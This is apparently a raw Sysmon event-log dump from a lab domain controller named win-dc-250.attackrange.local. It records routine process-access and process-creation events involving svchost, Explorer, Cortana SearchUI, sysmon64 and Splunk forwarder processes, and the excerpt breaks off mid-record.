13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013433Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013432Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013431Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013430Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013429Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013428Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013427Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013426Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013425Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013424Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013423Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013422Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013421Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013420Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013419Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013418Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013417Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013416Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013415Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013414Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:01.375{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013474Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:15.907{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4857-6000-5305-000000009A01}816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013473Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:15.907{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013472Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:15.907{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013471Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:15.907{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013470Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:15.907{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013469Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:15.907{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4857-6000-5305-000000009A01}816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013468Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:15.907{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4857-6000-5305-000000009A01}816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013467Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:15.908{08A6967A-4857-6000-5305-000000009A01}816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013466Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:15.235{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4857-6000-5205-000000009A01}4668C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013465Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:15.235{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013464Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:15.235{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|